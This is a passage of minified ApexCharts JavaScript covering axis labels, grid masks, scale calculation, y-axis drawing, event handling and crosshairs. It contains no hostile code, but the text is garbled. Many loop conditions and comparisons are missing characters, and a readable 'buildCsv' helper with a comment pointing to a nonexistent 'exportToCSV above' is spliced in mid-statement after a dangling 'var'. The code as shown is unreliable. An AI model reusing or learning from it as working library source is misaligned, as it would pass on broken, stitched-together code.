0!==arguments[6]?arguments[6]:{},u=[],c=[],d=this.w,h=l.xaxisFontSize||this.xaxisFontSize,p=l.xaxisFontFamily||this.xaxisFontFamily,m=l.xaxisForeColors||this.xaxisForeColors,f=l.fontWeight||d.config.xaxis.labels.style.fontWeight,v=l.cssClass||d.config.xaxis.labels.style.cssClass,g=d.globals.padHorizontal,b=i.length,k="category"===d.config.xaxis.type?d.globals.dataPoints:b;if(t){var y=k>1?k-1:k;o=d.globals.gridWidth/y,g=g+r(0,o)/2+d.config.xaxis.labels.offsetX}else o=d.globals.gridWidth/k,g=g+r(0,o)+d.config.xaxis.labels.offsetX;for(var x=function(t){var l=g-r(t,o)/2+d.config.xaxis.labels.offsetX;0===t&&1===b&&o/2===g&&1===k&&(l=d.globals.gridWidth/2);var y=s.axesUtils.getLabel(i,d.globals.timescaleLabels,l,t,u,h,e),x=28;if(d.globals.rotateXLabels&&e&&(x=22),e||(x=x+parseFloat(h)+(d.globals.xAxisLabelsHeight-d.globals.xAxisGroupLabelsHeight)+(d.globals.rotateXLabels?10:0)),y=void 0!==d.config.xaxis.tickAmount&&"dataPoints"!==d.config.xaxis.tickAmount&&"datetime"!==d.config.xaxis.type?s.axesUtils.checkLabelBasedOnTickamount(t,y,b):s.axesUtils.checkForOverflowingLabels(t,y,b,u,c),e&&y.text&&d.globals.xaxisLabelsCount++,d.config.xaxis.labels.show){var 
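/* Illustrative sketch of the CSV assembly in exportToCSV above: a header row,
   then one row per category; the column delimiter is stripped from labels and
   series names so embedded delimiters cannot break the row structure. */
function buildCsv(categories, seriesList, columnDelimiter, lineDelimiter) {
  columnDelimiter = columnDelimiter || ',';
  lineDelimiter = lineDelimiter || '\n';
  var clean = function (v) { return String(v).split(columnDelimiter).join(''); };
  var rows = [['category'].concat(seriesList.map(function (s, i) {
    return clean(s.name || 'series-' + (i + 1));
  })).join(columnDelimiter)];
  categories.forEach(function (c, i) {
    rows.push([clean(c)].concat(seriesList.map(function (s) {
      return s.data[i];
    })).join(columnDelimiter));
  });
  return rows.join(lineDelimiter);
}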
S=a.drawText({x:y.x,y:s.offY+d.config.xaxis.labels.offsetY+x-("top"===d.config.xaxis.position?d.globals.xAxisHeight+d.config.xaxis.axisTicks.height-2:0),text:y.text,textAnchor:"middle",fontWeight:y.isBold?600:f,fontSize:h,fontFamily:p,foreColor:Array.isArray(m)?e&&d.config.xaxis.convertedCatToNumeric?m[d.globals.minX+t-1]:m[t]:m,isPlainText:!1,cssClass:(e?"apexcharts-xaxis-label ":"apexcharts-xaxis-group-label ")+v});if(n.add(S),e){var A=document.createElementNS(d.globals.SVGNS,"title");A.textContent=Array.isArray(y.text)?y.text.join(" "):y.text,S.node.appendChild(A),""!==y.text&&(u.push(y.text),c.push(y))}}ti.globals.gridWidth)){var r=this.offY+i.config.xaxis.axisTicks.offsetY;if(a=a+r+i.config.xaxis.axisTicks.height,"top"===i.config.xaxis.position&&(a=r-i.config.xaxis.axisTicks.height),i.config.xaxis.axisTicks.show){var o=new S(this.ctx).drawLine(e+i.config.xaxis.axisTicks.offsetX,r+i.config.xaxis.offsetY,t+i.config.xaxis.axisTicks.offsetX,a+i.config.xaxis.offsetY,i.config.xaxis.axisTicks.color);n.add(o),o.node.classList.add("apexcharts-xaxis-tick")}}}},{key:"getXAxisTicksPositions",value:function(){var e=this.w,a=[],n=this.xaxisLabels.length,i=e.globals.padHorizontal;if(e.globals.timescaleLabels.length>0)for(var t=0;t0){var u=t[t.length-1].getBBox(),c=t[0].getBBox();u.x<-20&&t[t.length-1].parentNode.removeChild(t[t.length-1]),c.x+c.width>e.globals.gridWidth&&!e.globals.isBarHorizontal&&t[0].parentNode.removeChild(t[0]);for(var d=0;d0&&(this.xaxisLabels=n.globals.timescaleLabels.slice())}return u(e,[{key:"drawGridArea",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:null,a=this.w,n=new S(this.ctx);null===e&&(e=n.group({class:"apexcharts-grid"}));var i=n.drawLine(a.globals.padHorizontal,1,a.globals.padHorizontal,a.globals.gridHeight,"transparent"),t=n.drawLine(a.globals.padHorizontal,a.globals.gridHeight,a.globals.gridWidth,a.globals.gridHeight,"transparent");return e.add(t),e.add(i),e}},{key:"drawGrid",value:function(){var e=null;return this.w.globals.axisCharts&&(e=this.renderGrid(),this.drawGridArea(e.el)),e}},{key:"createGridMask",value:function(){var e=this.w,a=e.globals,n=new S(this.ctx),i=Array.isArray(e.config.stroke.width)?0:e.config.stroke.width;if(Array.isArray(e.config.stroke.width)){var t=0;e.config.stroke.width.forEach((function(e){t=Math.max(t,e)})),i=t}a.dom.elGridRectMask=document.createElementNS(a.SVGNS,"clipPath"),a.dom.elGridRectMask.setAttribute("id","gridRectMask".concat(a.cuid)),a.dom.elGridRectMarkerMask=document.createElementNS(a.SVGNS,"clipPath"),a.dom.elGridRectMarkerMask.setAttribute("id","gridRectMarkerMask".concat(a.cuid)),a.dom.elForecastMask=document.createElementNS(a.SVGNS,"clipPath"),a.dom.elForecastMask.setAttribute("id","forecastMask".concat(a.cuid)),a.dom.elNonForecastMask=document.createElementNS(a.SVGNS,"clipPath"),a.dom.elNonForecastMask.setAttribute("id","nonForecastMask".concat(a.cuid));var r=e.config.chart.type,o=0,s=0;("bar"===r||"rangeBar"===r||"candlestick"===r||"boxPlot"===r||e.globals.comboBarCount>0)&&e.globals.isXNumeric&&!e.globals.isBarHorizontal&&(o=e.config.grid.padding.left,s=e.config.grid.padding.right,a.barPadForNumericAxis>o&&(o=a.barPadForNumericAxis,s=a.barPadForNumericAxis)),a.dom.elGridRect=n.drawRect(-i/2-o-2,-i/2,a.gridWidth+i+s+o+4,a.gridHeight+i,0,"#fff");var 
l=e.globals.markers.largestSize+1;a.dom.elGridRectMarker=n.drawRect(2*-l,2*-l,a.gridWidth+4*l,a.gridHeight+4*l,0,"#fff"),a.dom.elGridRectMask.appendChild(a.dom.elGridRect.node),a.dom.elGridRectMarkerMask.appendChild(a.dom.elGridRectMarker.node);var u=a.dom.baseEl.querySelector("defs");u.appendChild(a.dom.elGridRectMask),u.appendChild(a.dom.elForecastMask),u.appendChild(a.dom.elNonForecastMask),u.appendChild(a.dom.elGridRectMarkerMask)}},{key:"_drawGridLines",value:function(e){var a=e.i,n=e.x1,i=e.y1,t=e.x2,r=e.y2,o=e.xCount,s=e.parent,l=this.w;if(!(0===a&&l.globals.skipFirstTimelinelabel||a===o-1&&l.globals.skipLastTimelinelabel&&!l.config.xaxis.labels.formatter||"radar"===l.config.chart.type)){l.config.grid.xaxis.lines.show&&this._drawGridLine({x1:n,y1:i,x2:t,y2:r,parent:s});var u=0;if(l.globals.hasGroups&&(void 0===l.config.xaxis.tickAmount||"dataPoints"===l.config.xaxis.tickAmount)&&"between"===l.config.xaxis.tickPlacement){var c=l.globals.groups;if(c){for(var d=0,h=0;d2));t++);return!e.globals.isBarHorizontal||this.isRangeBar?(n=this.xaxisLabels.length,this.isRangeBar&&(i=e.globals.labels.length,e.config.xaxis.tickAmount&&e.config.xaxis.labels.formatter&&(n=e.config.xaxis.tickAmount)),this._drawXYLines({xCount:n,tickAmount:i})):(n=i,i=e.globals.xTickAmount,this._drawInvertedXYLines({xCount:n,tickAmount:i})),this.drawGridBands(n,i),{el:this.elg,xAxisTickWidth:e.globals.gridWidth/n}}},{key:"drawGridBands",value:function(e,a){var n=this.w;if(void 0!==n.config.grid.row.colors&&n.config.grid.row.colors.length>0)for(var i=0,t=n.globals.gridHeight/a,r=n.globals.gridWidth,o=0,s=0;o=n.config.grid.row.colors.length&&(s=0),this._drawGridBandRect({c:s,x1:0,y1:i,x2:r,y2:t,type:"row"}),i+=n.globals.gridHeight/a;if(void 0!==n.config.grid.column.colors&&n.config.grid.column.colors.length>0)for(var l=n.globals.isBarHorizontal||"category"!==n.config.xaxis.type&&!n.config.xaxis.convertedCatToNumeric?e:e-1,u=n.globals.padHorizontal,c=n.globals.padHorizontal+n.globals.gridWidth/l,d=n.globals.gridHeight,h=0,p=0;h=n.config.grid.column.colors.length&&(p=0),this._drawGridBandRect({c:p,x1:u,y1:0,x2:c,y2:d,type:"column"}),u+=n.globals.gridWidth/l}}]),e}(),X=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"niceScale",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:10,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:0,t=arguments.length>4?arguments[4]:void 0,r=this.w,o=Math.abs(a-e);if("dataPoints"===(n=this._adjustTicksForSmallRange(n,i,o))&&(n=r.globals.dataPoints-1),e===Number.MIN_VALUE&&0===a||!k.isNumber(e)&&!k.isNumber(a)||e===Number.MIN_VALUE&&a===-Number.MAX_VALUE){e=0,a=n;var s=this.linearScale(e,a,n);return s}e>a?(console.warn("axis.min cannot be greater than axis.max"),a=e+.1):e===a&&(e=0===e?0:e-.5,a=0===a?2:a+.5);var l=[];o<1&&t&&("candlestick"===r.config.chart.type||"candlestick"===r.config.series[i].type||"boxPlot"===r.config.chart.type||"boxPlot"===r.config.series[i].type||r.globals.isRangeData)&&(a*=1.01);var u=n+1;u<2?u=2:u>2&&(u-=2);var c=o/u,d=Math.floor(k.log10(c)),h=Math.pow(10,d),p=Math.round(c/h);p<1&&(p=1);var m=p*h,f=m*Math.floor(e/m),v=m*Math.ceil(a/m),g=f;if(t&&o>2){for(;l.push(g),!((g+=m)>v););return{result:l,niceMin:l[0],niceMax:l[l.length-1]}}var b=e;(l=[]).push(b);for(var y=Math.abs(a-e)/n,x=0;x<=n;x++)b+=y,l.push(b);return l[l.length-2]>=a&&l.pop(),{result:l,niceMin:l[0],niceMax:l[l.length-1]}}},{key:"linearScale",value:function(e,a){var n=arguments.length>2&&void 
0!==arguments[2]?arguments[2]:10,i=arguments.length>3?arguments[3]:void 0,t=Math.abs(a-e);"dataPoints"===(n=this._adjustTicksForSmallRange(n,i,t))&&(n=this.w.globals.dataPoints-1);var r=t/n;n===Number.MAX_VALUE&&(n=10,r=1);for(var o=[],s=e;n>=0;)o.push(s),s+=r,n-=1;return{result:o,niceMin:o[0],niceMax:o[o.length-1]}}},{key:"logarithmicScale",value:function(e,a,n){for(var i=[],t=Math.ceil(Math.log(a)/Math.log(n))+1,r=0;r5)i.allSeriesCollapsed=!1,i.yAxisScale[e]=this.logarithmicScale(a,n,r.logBase);else if(n!==-Number.MAX_VALUE&&k.isNumber(n))if(i.allSeriesCollapsed=!1,void 0===r.min&&void 0===r.max||r.forceNiceScale){var s=void 0===t.yaxis[e].max&&void 0===t.yaxis[e].min||t.yaxis[e].forceNiceScale;i.yAxisScale[e]=this.niceScale(a,n,r.tickAmount?r.tickAmount:o<5&&o>1?o+1:5,e,s)}else i.yAxisScale[e]=this.linearScale(a,n,r.tickAmount,e);else i.yAxisScale[e]=this.linearScale(0,5,5)}},{key:"setXScale",value:function(e,a){var n=this.w,i=n.globals,t=n.config.xaxis,r=Math.abs(a-e);return a!==-Number.MAX_VALUE&&k.isNumber(a)?i.xAxisScale=this.linearScale(e,a,t.tickAmount?t.tickAmount:r<5&&r>1?r+1:5,0):i.xAxisScale=this.linearScale(0,5,5),i.xAxisScale}},{key:"setMultipleYScales",value:function(){var e=this,a=this.w.globals,n=this.w.config,i=a.minYArr.concat([]),t=a.maxYArr.concat([]),r=[];n.yaxis.forEach((function(a,o){var s=o;n.series.forEach((function(e,n){e.name===a.seriesName&&(s=n,o!==n?r.push({index:n,similarIndex:o,alreadyExists:!0}):r.push({index:n}))}));var l=i[s],u=t[s];e.setYScaleForIndex(o,l,u)})),this.sameScaleInMultipleAxes(i,t,r)}},{key:"sameScaleInMultipleAxes",value:function(e,a,n){var i=this,t=this.w.config,r=this.w.globals,o=[];n.forEach((function(e){e.alreadyExists&&(void 0===o[e.index]&&(o[e.index]=[]),o[e.index].push(e.index),o[e.index].push(e.similarIndex))})),r.yAxisSameScaleIndices=o,o.forEach((function(e,a){o.forEach((function(n,i){var t,r;a!==i&&(t=e,r=n,t.filter((function(e){return-1!==r.indexOf(e)}))).length>0&&(o[a]=o[a].concat(o[i]))}))}));var s=o.map((function(e){return e.filter((function(a,n){return e.indexOf(a)===n}))})).map((function(e){return e.sort()}));o=o.filter((function(e){return!!e}));var l=s.slice(),u=l.map((function(e){return JSON.stringify(e)}));l=l.filter((function(e,a){return u.indexOf(JSON.stringify(e))===a}));var c=[],d=[];e.forEach((function(e,n){l.forEach((function(i,t){i.indexOf(n)>-1&&(void 0===c[t]&&(c[t]=[],d[t]=[]),c[t].push({key:n,value:e}),d[t].push({key:n,value:a[n]}))}))}));var h=Array.apply(null,Array(l.length)).map(Number.prototype.valueOf,Number.MIN_VALUE),p=Array.apply(null,Array(l.length)).map(Number.prototype.valueOf,-Number.MAX_VALUE);c.forEach((function(e,a){e.forEach((function(e,n){h[a]=Math.min(e.value,h[a])}))})),d.forEach((function(e,a){e.forEach((function(e,n){p[a]=Math.max(e.value,p[a])}))})),e.forEach((function(e,a){d.forEach((function(e,n){var o=h[n],s=p[n];t.chart.stacked&&(s=0,e.forEach((function(e,a){e.value!==-Number.MAX_VALUE&&(s+=e.value),o!==Number.MIN_VALUE&&(o+=c[n][a].value)}))),e.forEach((function(n,l){e[l].key===a&&(void 0!==t.yaxis[a].min&&(o="function"==typeof t.yaxis[a].min?t.yaxis[a].min(r.minY):t.yaxis[a].min),void 0!==t.yaxis[a].max&&(s="function"==typeof t.yaxis[a].max?t.yaxis[a].max(r.maxY):t.yaxis[a].max),i.setYScaleForIndex(a,o,s))}))}))}))}},{key:"autoScaleY",value:function(e,a,n){e||(e=this);var i=e.w;if(i.globals.isMultipleYAxis||i.globals.collapsedSeries.length)return console.warn("autoScaleYaxis is not supported in a multi-yaxis chart."),a;var t=i.globals.seriesX[0],r=i.config.chart.stacked;return 
a.forEach((function(e,o){for(var s=0,l=0;l<t.length;l++)if(t[l]>=n.xaxis.min){s=l;break}var u,c,d=i.globals.minYArr[o],h=i.globals.maxYArr[o],p=i.globals.stackedSeriesTotals;i.globals.series.forEach((function(o,l){var m=o[s];r?(m=p[s],u=c=m,p.forEach((function(e,a){t[a]<=n.xaxis.max&&t[a]>=n.xaxis.min&&(e>c&&null!==e&&(c=e),o[a]=n.xaxis.min){var r=e,o=e;i.globals.series.forEach((function(n,i){null!==e&&(r=Math.min(n[a],r),o=Math.max(n[a],o))})),o>c&&null!==o&&(c=o),rd&&(u=d),a.length>1?(a[l].min=void 0===e.min?u:e.min,a[l].max=void 0===e.max?c:e.max):(a[0].min=void 0===e.min?u:e.min,a[0].max=void 0===e.max?c:e.max)}))})),a}}]),e}(),Q=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.scales=new X(a)}return u(e,[{key:"init",value:function(){this.setYRange(),this.setXRange(),this.setZRange()}},{key:"getMinYMaxY",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:Number.MAX_VALUE,n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:-Number.MAX_VALUE,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:null,t=this.w.config,r=this.w.globals,o=-Number.MAX_VALUE,s=Number.MIN_VALUE;null===i&&(i=e+1);var l=r.series,u=l,c=l;"candlestick"===t.chart.type?(u=r.seriesCandleL,c=r.seriesCandleH):"boxPlot"===t.chart.type?(u=r.seriesCandleO,c=r.seriesCandleC):r.isRangeData&&(u=r.seriesRangeStart,c=r.seriesRangeEnd);for(var d=e;du[d][h]&&u[d][h]<0&&(s=u[d][h])):r.hasNullValues=!0}}return"rangeBar"===t.chart.type&&r.seriesRangeStart.length&&r.isBarHorizontal&&(s=a),"bar"===t.chart.type&&(s<0&&o<0&&(o=0),s===Number.MIN_VALUE&&(s=0)),{minY:s,maxY:o,lowestY:a,highestY:n}}},{key:"setYRange",value:function(){var e=this.w.globals,a=this.w.config;e.maxY=-Number.MAX_VALUE,e.minY=Number.MIN_VALUE;var n=Number.MAX_VALUE;if(e.isMultipleYAxis)for(var i=0;i=0&&n<=10||void 0!==a.yaxis[0].min||void 0!==a.yaxis[0].max)&&(o=0),e.minY=n-5*o/100,n>0&&e.minY<0&&(e.minY=0),e.maxY=e.maxY+5*o/100}return a.yaxis.forEach((function(a,n){void 0!==a.max&&("number"==typeof a.max?e.maxYArr[n]=a.max:"function"==typeof a.max&&(e.maxYArr[n]=a.max(e.isMultipleYAxis?e.maxYArr[n]:e.maxY)),e.maxY=e.maxYArr[n]),void 0!==a.min&&("number"==typeof a.min?e.minYArr[n]=a.min:"function"==typeof a.min&&(e.minYArr[n]=a.min(e.isMultipleYAxis?e.minYArr[n]===Number.MIN_VALUE?0:e.minYArr[n]:e.minY)),e.minY=e.minYArr[n])})),e.isBarHorizontal&&["min","max"].forEach((function(n){void 0!==a.xaxis[n]&&"number"==typeof a.xaxis[n]&&("min"===n?e.minY=a.xaxis[n]:e.maxY=a.xaxis[n])})),e.isMultipleYAxis?(this.scales.setMultipleYScales(),e.minY=n,e.yAxisScale.forEach((function(a,n){e.minYArr[n]=a.niceMin,e.maxYArr[n]=a.niceMax}))):(this.scales.setYScaleForIndex(0,e.minY,e.maxY),e.minY=e.yAxisScale[0].niceMin,e.maxY=e.yAxisScale[0].niceMax,e.minYArr[0]=e.yAxisScale[0].niceMin,e.maxYArr[0]=e.yAxisScale[0].niceMax),{minY:e.minY,maxY:e.maxY,minYArr:e.minYArr,maxYArr:e.maxYArr,yAxisScale:e.yAxisScale}}},{key:"setXRange",value:function(){var e=this.w.globals,a=this.w.config,n="numeric"===a.xaxis.type||"datetime"===a.xaxis.type||"category"===a.xaxis.type&&!e.noLabelsProvided||e.noLabelsProvided||e.isXNumeric;if(e.isXNumeric&&function(){for(var a=0;ae.dataPoints&&0!==e.dataPoints&&(i=e.dataPoints-1)):"dataPoints"===a.xaxis.tickAmount?(e.series.length>1&&(i=e.series[e.maxValsInArrayIndex].length-1),e.isXNumeric&&(i=e.maxX-e.minX-1)):i=a.xaxis.tickAmount,e.xTickAmount=i,void 0!==a.xaxis.max&&"number"==typeof a.xaxis.max&&(e.maxX=a.xaxis.max),void 0!==a.xaxis.min&&"number"==typeof a.xaxis.min&&(e.minX=a.xaxis.min),void 
0!==a.xaxis.range&&(e.minX=e.maxX-a.xaxis.range),e.minX!==Number.MAX_VALUE&&e.maxX!==-Number.MAX_VALUE)if(a.xaxis.convertedCatToNumeric&&!e.dataFormatXNumeric){for(var t=[],r=e.minX-1;r0&&(e.xAxisScale=this.scales.linearScale(1,e.labels.length,i-1),e.seriesX=e.labels.slice());n&&(e.labels=e.xAxisScale.result.slice())}return e.isBarHorizontal&&e.labels.length&&(e.xTickAmount=e.labels.length),this._handleSingleDataPoint(),this._getMinXDiff(),{minX:e.minX,maxX:e.maxX}}},{key:"setZRange",value:function(){var e=this.w.globals;if(e.isDataXYZ)for(var a=0;a0){var t=a-i[n-1];t>0&&(e.minXDiff=Math.min(t,e.minXDiff))}})),1!==e.dataPoints&&e.minXDiff!==Number.MAX_VALUE||(e.minXDiff=.5)}))}},{key:"_setStackedMinMax",value:function(){var e=this.w.globals,a=[],n=[];if(e.series.length)for(var i=0;i0?t=t+parseFloat(e.series[o][i])+1e-4:r+=parseFloat(e.series[o][i])),o===e.series.length-1&&(a.push(t),n.push(r));for(var s=0;s=0;g--)v(g);if(void 0!==n.config.yaxis[e].title.text){var b=i.group({class:"apexcharts-yaxis-title"}),k=0;n.config.yaxis[e].opposite&&(k=n.globals.translateYAxisX[e]);var y=i.drawText({x:k,y:n.globals.gridHeight/2+n.globals.translateY+n.config.yaxis[e].title.offsetY,text:n.config.yaxis[e].title.text,textAnchor:"end",foreColor:n.config.yaxis[e].title.style.color,fontSize:n.config.yaxis[e].title.style.fontSize,fontWeight:n.config.yaxis[e].title.style.fontWeight,fontFamily:n.config.yaxis[e].title.style.fontFamily,cssClass:"apexcharts-yaxis-title-text "+n.config.yaxis[e].title.style.cssClass});b.add(y),l.add(b)}var x=n.config.yaxis[e].axisBorder,A=31+x.offsetX;if(n.config.yaxis[e].opposite&&(A=-31-x.offsetX),x.show){var w=i.drawLine(A,n.globals.translateY+x.offsetY-2,A,n.globals.gridHeight+n.globals.translateY+x.offsetY+2,x.color,0,x.width);l.add(w)}return n.config.yaxis[e].axisTicks.show&&this.axesUtils.drawYAxisTicks(A,c,x,n.config.yaxis[e].axisTicks,e,d,l),l}},{key:"drawYaxisInversed",value:function(e){var a=this.w,n=new S(this.ctx),i=n.group({class:"apexcharts-xaxis apexcharts-yaxis-inversed"}),t=n.group({class:"apexcharts-xaxis-texts-g",transform:"translate(".concat(a.globals.translateXAxisX,", ").concat(a.globals.translateXAxisY,")")});i.add(t);var r=a.globals.yAxisScale[e].result.length-1,o=a.globals.gridWidth/r+.1,s=o+a.config.xaxis.labels.offsetX,l=a.globals.xLabelFormatter,u=a.globals.yAxisScale[e].result.slice(),c=a.globals.timescaleLabels;c.length>0&&(this.xaxisLabels=c.slice(),r=(u=c.slice()).length),u=this.axesUtils.checkForReversedLabels(e,u);var d=c.length;if(a.config.xaxis.labels.show)for(var h=d?0:r;d?h=0;d?h++:h--){var p=u[h];p=l(p,h,a);var m=a.globals.gridWidth+a.globals.padHorizontal-(s-o+a.config.xaxis.labels.offsetX);if(c.length){var f=this.axesUtils.getLabel(u,c,m,h,this.drawnLabels,this.xaxisFontSize);m=f.x,p=f.text,this.drawnLabels.push(f.text),0===h&&a.globals.skipFirstTimelinelabel&&(p=""),h===u.length-1&&a.globals.skipLastTimelinelabel&&(p="")}var v=n.drawText({x:m,y:this.xAxisoffX+a.config.xaxis.labels.offsetY+30-("top"===a.config.xaxis.position?a.globals.xAxisHeight+a.config.xaxis.axisTicks.height-2:0),text:p,textAnchor:"middle",foreColor:Array.isArray(this.xaxisForeColors)?this.xaxisForeColors[e]:this.xaxisForeColors,fontSize:this.xaxisFontSize,fontFamily:this.xaxisFontFamily,fontWeight:a.config.xaxis.labels.style.fontWeight,isPlainText:!1,cssClass:"apexcharts-xaxis-label "+a.config.xaxis.labels.style.cssClass});t.add(v),v.tspan(p);var g=document.createElementNS(a.globals.SVGNS,"title");g.textContent=p,v.node.appendChild(g),s+=o}return 
this.inversedYAxisTitleText(i),this.inversedYAxisBorder(i),i}},{key:"inversedYAxisBorder",value:function(e){var a=this.w,n=new S(this.ctx),i=a.config.xaxis.axisBorder;if(i.show){var t=0;"bar"===a.config.chart.type&&a.globals.isXNumeric&&(t-=15);var r=n.drawLine(a.globals.padHorizontal+t+i.offsetX,this.xAxisoffX,a.globals.gridWidth,this.xAxisoffX,i.color,0,i.height);e.add(r)}}},{key:"inversedYAxisTitleText",value:function(e){var a=this.w,n=new S(this.ctx);if(void 0!==a.config.xaxis.title.text){var i=n.group({class:"apexcharts-xaxis-title apexcharts-yaxis-title-inversed"}),t=n.drawText({x:a.globals.gridWidth/2+a.config.xaxis.title.offsetX,y:this.xAxisoffX+parseFloat(this.xaxisFontSize)+parseFloat(a.config.xaxis.title.style.fontSize)+a.config.xaxis.title.offsetY+20,text:a.config.xaxis.title.text,textAnchor:"middle",fontSize:a.config.xaxis.title.style.fontSize,fontFamily:a.config.xaxis.title.style.fontFamily,fontWeight:a.config.xaxis.title.style.fontWeight,foreColor:a.config.xaxis.title.style.color,cssClass:"apexcharts-xaxis-title-text "+a.config.xaxis.title.style.cssClass});i.add(t),e.add(i)}}},{key:"yAxisTitleRotate",value:function(e,a){var n=this.w,i=new S(this.ctx),t={width:0,height:0},r={width:0,height:0},o=n.globals.dom.baseEl.querySelector(" .apexcharts-yaxis[rel='".concat(e,"'] .apexcharts-yaxis-texts-g"));null!==o&&(t=o.getBoundingClientRect());var s=n.globals.dom.baseEl.querySelector(".apexcharts-yaxis[rel='".concat(e,"'] .apexcharts-yaxis-title text"));if(null!==s&&(r=s.getBoundingClientRect()),null!==s){var l=this.xPaddingForYAxisTitle(e,t,r,a);s.setAttribute("x",l.xPos-(a?10:0))}if(null!==s){var u=i.rotateAroundCenter(s);s.setAttribute("transform","rotate(".concat(a?-1*n.config.yaxis[e].title.rotate:n.config.yaxis[e].title.rotate," ").concat(u.x," ").concat(u.y,")"))}}},{key:"xPaddingForYAxisTitle",value:function(e,a,n,i){var t=this.w,r=0,o=0,s=10;return void 0===t.config.yaxis[e].title.text||e<0?{xPos:o,padd:0}:(i?(o=a.width+t.config.yaxis[e].title.offsetX+n.width/2+s/2,0===(r+=1)&&(o-=s/2)):(o=-1*a.width+t.config.yaxis[e].title.offsetX+s/2+n.width/2,t.globals.isBarHorizontal&&(s=25,o=-1*a.width-t.config.yaxis[e].title.offsetX-s)),{xPos:o,padd:s})}},{key:"setYAxisXPosition",value:function(e,a){var n=this.w,i=0,t=0,r=18,o=1;n.config.yaxis.length>1&&(this.multipleYs=!0),n.config.yaxis.map((function(s,l){var u=n.globals.ignoreYAxisIndexes.indexOf(l)>-1||!s.show||s.floating||0===e[l].width,c=e[l].width+a[l].width;s.opposite?n.globals.isBarHorizontal?(t=n.globals.gridWidth+n.globals.translateX-1,n.globals.translateYAxisX[l]=t-s.labels.offsetX):(t=n.globals.gridWidth+n.globals.translateX+o,u||(o=o+c+20),n.globals.translateYAxisX[l]=t-s.labels.offsetX+20):(i=n.globals.translateX-r,u||(r=r+c+20),n.globals.translateYAxisX[l]=i+s.labels.offsetX)}))}},{key:"setYAxisTextAlignments",value:function(){var e=this.w,a=e.globals.dom.baseEl.getElementsByClassName("apexcharts-yaxis");(a=k.listToArray(a)).forEach((function(a,n){var i=e.config.yaxis[n];if(i&&void 0!==i.labels.align){var t=e.globals.dom.baseEl.querySelector(".apexcharts-yaxis[rel='".concat(n,"'] .apexcharts-yaxis-texts-g")),r=e.globals.dom.baseEl.querySelectorAll(".apexcharts-yaxis[rel='".concat(n,"'] .apexcharts-yaxis-label"));r=k.listToArray(r);var o=t.getBoundingClientRect();"left"===i.labels.align?(r.forEach((function(e,a){e.setAttribute("text-anchor","start")})),i.opposite||t.setAttribute("transform","translate(-".concat(o.width,", 
0)"))):"center"===i.labels.align?(r.forEach((function(e,a){e.setAttribute("text-anchor","middle")})),t.setAttribute("transform","translate(".concat(o.width/2*(i.opposite?1:-1),", 0)"))):"right"===i.labels.align&&(r.forEach((function(e,a){e.setAttribute("text-anchor","end")})),i.opposite&&t.setAttribute("transform","translate(".concat(o.width,", 0)")))}}))}}]),e}(),ee=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.documentEvent=k.bind(this.documentEvent,this)}return u(e,[{key:"addEventListener",value:function(e,a){var n=this.w;n.globals.events.hasOwnProperty(e)?n.globals.events[e].push(a):n.globals.events[e]=[a]}},{key:"removeEventListener",value:function(e,a){var n=this.w;if(n.globals.events.hasOwnProperty(e)){var i=n.globals.events[e].indexOf(a);-1!==i&&n.globals.events[e].splice(i,1)}}},{key:"fireEvent",value:function(e,a){var n=this.w;if(n.globals.events.hasOwnProperty(e)){a&&a.length||(a=[]);for(var i=n.globals.events[e],t=i.length,r=0;r0&&(a=this.w.config.chart.locales.concat(window.Apex.chart.locales));var n=a.filter((function(a){return a.name===e}))[0];if(!n)throw new Error("Wrong locale name provided. Please make sure you set the correct locale name in options");var i=k.extend(P,n);this.w.globals.locale=i.options}}]),e}(),ne=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"drawAxis",value:function(e,a){var n,i,t=this.w.globals,r=this.w.config,o=new q(this.ctx),s=new $(this.ctx);t.axisCharts&&"radar"!==e&&(t.isBarHorizontal?(i=s.drawYaxisInversed(0),n=o.drawXaxisInversed(0),t.dom.elGraphical.add(n),t.dom.elGraphical.add(i)):(n=o.drawXaxis(),t.dom.elGraphical.add(n),r.yaxis.map((function(e,a){-1===t.ignoreYAxisIndexes.indexOf(a)&&(i=s.drawYaxis(a),t.dom.Paper.add(i))}))))}}]),e}(),ie=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"drawXCrosshairs",value:function(){var e=this.w,a=new S(this.ctx),n=new x(this.ctx),i=e.config.xaxis.crosshairs.fill.gradient,t=e.config.xaxis.crosshairs.dropShadow,r=e.config.xaxis.crosshairs.fill.type,o=i.colorFrom,s=i.colorTo,l=i.opacityFrom,u=i.opacityTo,c=i.stops,d=t.enabled,h=t.left,p=t.top,m=t.blur,f=t.color,v=t.opacity,g=e.config.xaxis.crosshairs.fill.color;if(e.config.xaxis.crosshairs.show){"gradient"===r&&(g=a.drawGradient("vertical",o,s,l,u,null,c,null));var b=a.drawRect();1===e.config.xaxis.crosshairs.width&&(b=a.drawLine());var y=e.globals.gridHeight;(!k.isNumber(y)||y<0)&&(y=0);var A=e.config.xaxis.crosshairs.width;(!k.isNumber(A)||A<0)&&(A=0),b.attr({class:"apexcharts-xcrosshairs",x:0,y:0,y2:y,width:A,height:y,fill:g,filter:"none","fill-opacity":e.config.xaxis.crosshairs.opacity,stroke:e.config.xaxis.crosshairs.stroke.color,"stroke-width":e.config.xaxis.crosshairs.stroke.width,"stroke-dasharray":e.config.xaxis.crosshairs.stroke.dashArray}),d&&(b=n.dropShadow(b,{left:h,top:p,blur:m,color:f,opacity:v})),e.globals.dom.elGraphical.add(b)}}},{key:"drawYCrosshairs",value:function(){var e=this.w,a=new S(this.ctx),n=e.config.yaxis[0].crosshairs,i=e.globals.barPadForNumericAxis;if(e.config.yaxis[0].crosshairs.show){var t=a.drawLine(-i,0,e.globals.gridWidth+i,0,n.stroke.color,n.stroke.dashArray,n.stroke.width);t.attr({class:"apexcharts-ycrosshairs"}),e.globals.dom.elGraphical.add(t)}var 